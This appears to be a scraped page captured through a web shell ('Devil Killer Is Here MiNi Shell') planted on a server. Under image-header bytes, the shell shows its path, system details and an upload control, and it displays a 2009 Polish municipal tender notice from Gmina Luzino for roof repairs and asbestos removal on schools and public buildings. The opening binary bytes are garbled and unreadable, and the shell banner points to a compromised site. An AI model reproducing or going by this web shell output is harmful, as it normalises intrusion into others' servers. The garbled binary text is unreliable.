JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/101868-N-2009.html

<p class="kh_header"><b>Luzino: REMONTY POKRYĆ DACHOWYCH NA OBIEKTACH KOMUNALNYCH I SZKOŁACH ZNAJDUJĄCYCH SIĘ NA TERENIE GMINY LUZINO</b><br>
<b>Numer ogłoszenia: 101868 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Luzino , ul. Ofiar Stutthofu 11, 84-242 Luzino, woj. pomorskie, tel. 058 6782068 w. 49, faks 058 6782325.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.luzino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONTY POKRYĆ DACHOWYCH NA OBIEKTACH KOMUNALNYCH I SZKOŁACH ZNAJDUJĄCYCH SIĘ NA TERENIE GMINY LUZINO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są remonty pokryć dachowych na obiektach komunalnych i szkołach znajdujących się na terenie Gminy Luzino.
Przedmiot zamówienia składa się z 5 części:
1)	Część pierwsza: Wykonanie remontu dachu wraz z termoizolacją budynku Szkoły Podstawowej w Kębłowie - polegający na rozebraniu pokryć, rynien, rur spustowych i obróbek blacharskich oraz przygotowanie blach z rozbiórki do dalszego użytku, rozebraniu pokryć, rynien, rur spustowych i obróbek blacharskich oraz przygotowanie blach z rozbiórki do dalszego użytku, rozebraniu obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów itp. z blachy nie nadającej się do użytku,  odbiciu tynków wewn. z zaprawy cementowo-wapiennej na ścianach, filarach, pilastrach o pow. odbicia do 5 m2, wykonaniu tynków zwykłych cem. - wap. kat. III na kominach ponad dachem płaskim, rozebraniu pokrycia z płyt i gąsiorów azbest. - cem. nie nadających sie do użytku, utylizacji płyt azbestowych, obróbce blacharskiej z blachy powlekanej - obróbki o szerokości w rozwinięciu do 25 cm, murłaty - przekr. poprz. drewna do 180cm2 z tarcicy nasyc., pokryciu dachów blachą powlekaną - montaż elementów wykończeniowych. Pasy nadrynnowe - okapy., obróbce blacharskiej z blachy powlekanej - obróbki o szerokości w rozwinięciu do 25 cm, obróbce blacharskiej z blachy powlekanej - obróbki o szerokości w rozwinięciu ponad 25 cm, montażu prefabrykowanych rynien dachowych z blachy powlekanej - półokrągłe o średnicy 15 cm, blacha powlekana, izolacje cieplne i przeciwdźwiękowe z płyt styropianowych poziome na wierzchu konstr. na lepiku,  warstwy wyrównawcze pod posadzki z zaprawy cementowej gr.20 mm zatarte na ostro, warstwy wyrównawcze pod posadzki z zaprawy cementowej - dodatek lub potrąc.za zmianę grub. o 10mm, pokryciu dachów papą termozgrzewalną - pokryciu papą termozgrzewalną, dwuwarstwowe - papa termozgrzewalna o grubości min. 5 mm, sile zrywającej wzdłuż i poprzek min. 800 N/5cm, wkładce nośnej - tkanina poliestrowa o gr. min. 250 g/m2, masie pokrywającej - SRS, 	rozebraniu pokryć, rynien, rur spustowych o obróbek blach. z rozb. do użytku rury spust. z blachy nie nadającej się do użytku, montażu prefabrykowanych rur spustowych z blachy powlekanej - okrągłe o średnicy 12 cm.
2)	Część druga:  Remont dachu na budynku Szkoły Podstawowej w Luzinie przy ul. Szkolnej  - polegający na drobnej naprawie pokrycia papowego polegającej na umocowaniu pokrycia i zakitowaniu,  naprawie  pokryć dachowych papą termozgrzewalną - jednokrotne pokrycie papą wierzchniego krycia - papa termozgrzewalna o grubości min. 5 mm, sile zrywającej wzdłuż i w poprzek min. 800 N 5 cm, wkładce nośnej - tkanina poliestrowa o gr. min. 250 g m2, masie pokrywającej - SRS, dwukrotnym malowaniu farbą olejną rynien i rur spustowych farbą DOMAX lub o równoważnych parametrach, obróbce blacharskie z blachy powlekanej - kapslistwy na kominkach -  obróbki o szerokości w rozwinięciu do 25 cm.
3)	Część trzecia: Wymiana pokrycia dachowego z płyt azbestowo-cementowych na blacho dachówkę na budynku Szkoły Podstawowej w Luzinie, przy ul. Ofiar Stutthofu 13- polegający na rozebraniu pokrycia z płyt azbestowo-cementowych nie nadających się do użytku, zabezpieczenie przed pyleniem, foliowanie, utylizacji płyt azbestowych, rozebraniu rynien z blachy nie nadającej się do użytku, rozebraniu rur spustowych z blachy nie nadającej się do użytku, przemurowaniu kominów z cegieł o objętości w jednym miejscu ponad 0,5 m3 , spoinowaniu ścian zaprawą cementową, barwioną, wymianie elementów konstrukcyjnych dachu - krokwie narożne lub koszowe, rozebraniu elementów więźb dachowych - ołacenie dachu o odstępie łat ponad 24 cm, rozebraniu elementów więźb dachowych - deskowaniu dachu z desek na styk, ułożeniu folii na dachu z folii dachowej, ołaceniu połaci dachowych latami 38x50mm,o rozst. ponad 24cm z tarcicy nasyc.,  pokryciu dachów o nachyleniu połaci do 85% blachą powlekaną dachówkową na łatach - dachy o powierzchni ponad 100 m2,  pokryciu dachów blachą powlekaną - montaż elementów wykończeniowych Gąsiory, pokryciu dachów blachą powlekaną - montaż elementów wykończeniowych - pasy nadrynnowe - okapy, pokryciu dachów blachą powlekaną - montaż elementów wykończeniowych - osłony boczne - wiatrownice, okna i włazy dachowe fabrycznie wykończone - właz dachowy, obróbce  blacharskiej z blachy powlekanej - obróbki o szerokości w rozwinięciu do 25 cm, łączeniu połaci dachowych dla pokryć z blach powlekanych - przybicie deski czołowej, montaż prefabrykowanych rynien dachowych z blachy powlekanej - półokrągłe o średnicy 15 cm, blacha powlekana, montażu prefabrykowanych rur spustowych z blachy powlekanej - okrągłe o średnicy 12 cm, rury spustowe - montaż kolanek, rynny dachowe półokrągłe - montaż lejów spustowych, wymiana podsufitki z desek profilowanych o grub.25 mm, wykonaniu rusztowania przy kominach o obw. od 2 do 5 m, wywiezieniu samochodami skrzyniowymi gruzu z rozbieranych konstrukcji ceglanych na odległość do 1 km, utylizacji gruzu-dopisany, wymianie wsporników instalacji odgromowej na dachu płaskim krytym blachą, wymianie przewodów instalacji odgromowej z linki o przekroju do 50 mm2 na dachach stromych na uprzednio przygotowanej konstrukcji, drobnej naprawie pokrycia papowego polegające na umocowaniu pokrycia i zakitowaniu, naprawie pokryć dachowych papą termozgrzewalna. Jednokrotne pokrycie papą wierzchniego krycia. Papa termozgrzewalna o grubości min. 5 mm, sile zrywającej wzdłuż i poprzek min. 800 N 5 cm, wkładce nośnej - tkanina poliestrowa o grub. min. 250 g m2, masie pokrywającej - SRS
4)	Część czwarta: Remont dachu na budynku Domu Nauczyciela w Luzinie, przy ul. Szkolnej- polegający na rozebraniu pokryć, rynien rur i obróbek z blachy nie nadającej się do użytku, rozebraniu rur spustowych z blachy nie nadającej się do użytku, rozebraniu obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów itp. z blachy nie nadającej się do użytku, rozebraniu obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów itp. z blachy nie nadającej się do użytku - demontaż pasa nadrynnowego, obróbki blacharskie z blachy powlekanej - montaż gzymsu - obróbki o szerokości w rozwinięciu ponad 25 cm, pokrycie dachów blachą powlekaną - montaż elementów wykończeniowych - pasy nadrynnowe - okapy, montażu prefabrykowanych rynien dachowych z blachy powlekanej -półokrągłe o średnicy 15 cm, montażu prefabrykowanych rur spustowych z blachy powlekanej - okrągłe o średnicy 12 cm, rynny dachowe półokrągłe - montaż lejów spustowych, rury spustowe - montaż kolanek, wykonanie puszek przy rynnach, obróbce blacharskiej z blachy powlekanej - wykonanie czapek na kominach. Obróbki o szerokości w rozwinięciu ponad 25 cm, drobne naprawy pokrycia papowego polegające na umocowaniu pokrycia i zakitowaniu, naprawa pokryć dachowych papą termozgrzewalną. Jednokrotne pokrycie papą wierzch-niego krycia. Papa termozgrzewalna o grub. min. 5 mm, sile zrywającej wzdłuż i poprzek min. 800 N 5cm, wkładce nośnej - tkanina poliestrowa o gr.250g/m2, masie pokrywającej - SRS	
5)	Część piąta: Wymiana pokrycia dachowego z płyt azbestowo-cementowych na blacho dachówkę  na budynku Urzędu Gminy przy ul.  Wilczka  - polegający na rozebraniu pokrycia z płyt azbestowo-cementowych nie nadających się do użytku, zabezpieczenie przed pyleniem, foliowanie, utylizacji płyt azbestowych, rozebraniu rynien z blachy nie nadającej się do użytku, rozebraniu rur spustowych z blachy nie nadającej się do użytku, rozebraniu elementów więźb dachowych - ołacenie dachu o odstępie łat ponad 24 cm, ułożenie folii na dachu z folii dachowej, ołacenie połaci dachowych latami 38x50mm,o rozst. ponad 24cm z tarcicy nasyc., pokrycie dachów o nachyleniu połaci do 85% blachą powlekaną dachówkową na łatach - dachy o powierzchni ponad 100 m2, pokryciu dachów blachą powlekaną - montaż elementów wykończeniowych Gąsiory, pokryciu dachów blachą powlekaną - montaż elementów wykończeniowych - pasy nadrynnowe - okapy, 	pokryciu dachów blachą powlekaną - montaż elementów wykończeniowych - osłony boczne - wiatrownice, okna i włazy dachowe fabrycznie wykończone - właz dachowy, okna i włazy dachowe fabrycznie wykończone, świetliki i klapy dymowe - okna poddaszy połaciowe, uzupełnieniu poziomych ław kominiarskich, obróbki blacharskie z blachy powlekanej - obróbki o szerokości w rozwinięciu do 25 cm, montażu prefabrykowanych rynien dachowych z blachy powlekanej - półokrągłe o średnicy 15 cm, blacha powlekana, montażu prefabrykowanych rur spustowych z blachy powlekanej - okrągłe o średnicy 12 cm, rury spustowe - montaż kolanek, rynny dachowe półokrągłe - montaż lejów spustowych, wymianie podsufitki z desek profilowanych o grub.25 mm, tynki c-w na kominach ponad dachem (wapno ciasto kol.1-10, suchog. kol. 11020) spadzistym - wykonanie tynków kat. III, wykonaniu rusztowania przy kominach o obw. od 2 do 5 m, wymianie wsporników instalacji odgromowej na dachu płaskim krytym blachą, wymianie przewodów instalacji odgromowej z linki o przekroju do 50 mm2 na dachach stromych na uprzednio przygotowanej konstrukcji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.26.26.60-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawcy są zobowiązani wpłacić wadium w wysokości dla:
1)	Części pierwszej Wykonanie remontu dachu wraz z termoizolacją budynku Szkoły Podstawowej w Kębłowie700,00 zł (siedemset złotych i 00/100) w terminie do dnia 07.05.2009r. do godz. 12.00 na konto Urzędu Gminy Luzino w Banku Spółdzielczym w Krokowej  O/Luzino  nr 81 8349 0002 0012 8818 2000 0090  lub wnieść wadium w innej formie zgodnej z Ustawą prawo zamówień publicznych.
2)	Części drugiej Remont dachu na budynku Szkoły Podstawowej w Luzinie przy ul. Szkolnej 200,00 zł (dwieście złotych i 00/100) w terminie do dnia 07.05.2009r. do godz. 12.00 na konto Urzędu Gminy Luzino w Banku Spółdzielczym w Krokowej  O/Luzino  nr 81 8349 0002 0012 8818 2000 0090  lub wnieść wadium w innej formie zgodnej z Ustawą prawo zamówień publicznych.
3)	Część trzecia: Wymiana pokrycia dachowego z płyt azbestowo-cementowych na blacho dachówkę na budynku Szkoły Podstawowej w Luzinie, przy ul. Ofiar Stutthofu 13  600,00 zł (sześćset  złotych i 00/100) w terminie do dnia 07.05.2009r. do godz. 12.00 na konto Urzędu Gminy Luzino w Banku Spółdzielczym w Krokowej  O/Luzino  nr 81 8349 0002 0012 8818 2000 0090  lub wnieść wadium w innej formie zgodnej z Ustawą prawo zamówień publicznych.
4)	Część czwarta:  Remont dachu na budynku Domu Nauczyciela w Luzinie, przy ul. Szkolnej 100,00 zł (sto złotych i 00/100) w terminie do dnia 07.05.2009r. do godz. 12.00 na konto Urzędu Gminy Luzino w Banku Spółdzielczym w Krokowej  O/Luzino  nr 81 8349 0002 0012 8818 2000 0090  lub wnieść wadium w innej formie zgodnej z Ustawą prawo zamówień publicznych.
5)	Część piąta: Wymiana pokrycia dachowego z płyt azbestowo-cementowych na blacho dachówkę  na budynku Urzędu Gminy przy ul.  Wilczka  400,00 zł (czterysta złotych i 00/100) w terminie do dnia 07.05.2009r. do godz. 12.00 na konto Urzędu Gminy Luzino w Banku Spółdzielczym w Krokowej  O/Luzino  nr 81 8349 0002 0012 8818 2000 0090  lub wnieść wadium w innej formie zgodnej z Ustawą prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 13. Warunki udziału w postępowaniu.
13.1.  Zgodnie z art. 22 Ustawy, o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
13.1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień;
13.1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia;
13.1.3. znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
13.1.4  nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 ust. 1 Ustawy prawo zamówień publicznych;
14.1.  Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu dot. części pierwszej i czwartej.
14.1.1.  W zakresie warunku wskazanego w punkcie 13.1.1 ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 15.1.1.
14.1.2. W zakresie warunku wskazanego w punkcie 13.1.2 wymagane jest posiadanie przez Wykonawcę niezbędnego doświadczenia rozumianego jako zrealizowane w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej roboty, odpowiadającej swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia.
Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 15.1.2.
14.1.3. W zakresie warunku wskazanego w punkcie 13.1.3 ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 15.1.3.
14.1.4. W zakresie warunku wskazanego w punkcie 13.1.4 ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w punkcie 15.1.3.
16.1.  Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu dot. części drugiej, trzeciej i piątej.
16.1.1.  W zakresie warunku wskazanego w punkcie 13.1.1 ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 17.1.1.
16.1.2. W zakresie warunku wskazanego w punkcie 13.1.2 wymagane jest posiadanie przez Wykonawcę niezbędnego doświadczenia rozumianego jako zrealizowane w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej roboty, odpowiadającej swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia.
Wymagane jest również, aby Wykonawca dysponował min. jedną osobą przeszkoloną w                                                                   zakresie bezpieczeństwa i higieny pracy z uwzględnieniem programu szkolenia w zakresie bezpiecznego użytkowania wyrobów zawierających azbest.
Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 17.1.2.
16.1.3. W zakresie warunku wskazanego w punkcie 13.1.3 ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 17.1.3.
16.1.4. W zakresie warunku wskazanego w punkcie 13.1.4 ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w punkcie 17.1.3..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 15.1. W celu wykazania spełnienia warunków udziału w postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
15.1.1. Warunki szczegółowe określone w punkcie 14.1.1.  SIWZ - do ofert każdy z Wykonawców powinien załączyć:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
15.1.2. Warunki szczegółowe określone w punkcie 14.1.2.  SIWZ - wraz z ofertą każdy z Wykonawców powinien załączyć:
- wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia,  z podaniem ich wartości, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie. 
15.1.3. Warunki szczegółowe określone w punkcie 14.1.3 SIWZ oraz w punkcie 14.1.4 SIWZ - wraz z ofertą każdy z Wykonawców powinien złożyć:
-	oświadczenie zgodnie z art. 22 ust. 1 oraz art. 24 ustawy Prawo zamówień publicznych 
17.1. W celu wykazania spełnienia warunków udziału w postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
17.1.1. Warunki szczegółowe określone w punkcie 16.1.1.  SIWZ - do ofert każdy z Wykonawców powinien załączyć:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- decyzję administracyjną zezwalającą na gospodarkę odpadami niebezpiecznymi na terenie powiatu wejherowskiego wydaną w oparciu o ustawę o odpadach z dn. 27.04.2001 r. (Dz.U. 2007 Nr 39, poz. 251 z późn. zm.),
- umowę z firmą transportową posiadającą zezwolenie na transport odpadów niebezpiecznych - w przypadku korzystania przez Wykonawcę z usług transportowych innego podmiotu gospodarczego,
- umowę na zdeponowanie odpadów azbestowo-cementowych podpisaną z właścicielem składowiska odpadów posiadającym odpowiednie zezwolenie na prowadzenie działalności w zakresie unieszkodliwiania odpadów w tym odpadów niebezpiecznych.
17.1.2. Warunki szczegółowe określone w punkcie 16.1.2.  SIWZ - wraz z ofertą każdy z Wykonawców powinien załączyć:
- wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia,  z podaniem ich wartości, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie,
 - wykazu osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca  i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, do wykazu należy dołączyć oświadczenie Wykonawcy o przeszkoleniu min. jednego pracownika ( którym dysponuje lub będzie dysponował Wykonawca) w zakresie bezpieczeństwa i higieny pracy z uwzględnieniem programu szkolenia w zakresie bezpiecznego użytkowania wyrobów zawierających azbest.
17.1.3. Warunki szczegółowe określone w punkcie 16.1.3 SIWZ oraz w punkcie 16.1.4 SIWZ - wraz z ofertą każdy z Wykonawców powinien złożyć:
-	oświadczenie zgodnie z art. 22 ust. 1 oraz art. 24 ustawy Prawo zamówień publicznych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.luzino.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Luzino
Ul. 10 Marca 11
84-242 Lzuino.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2009 godzina 13:00, miejsce: Urząd Gminy Luzino
Kancelaria
ul. Ofiar Stutthofu 11
84-242 Luzino.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część pierwsza: Wykonanie remontu dachu wraz z termoizolacją budynku Szkoły Podstawowej w Kębłowie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu dachu wraz z termoizolacją budynku Szkoły Podstawowej w Kębłowie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.26.26.60-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część druga: Remont dachu na budynku Szkoły Podstawowej w Luzinie przy ul. Szkolnej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont dachu na budynku Szkoły Podstawowej w Luzinie przy ul. Szkolnej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część trzecia: Wymiana pokrycia dachowego z płyt azbestowo-cementowych na blacho dachówkę na budynku Szkoły Podstawowej w Luzinie, przy ul. Ofiar Stutthofu 13.</p>
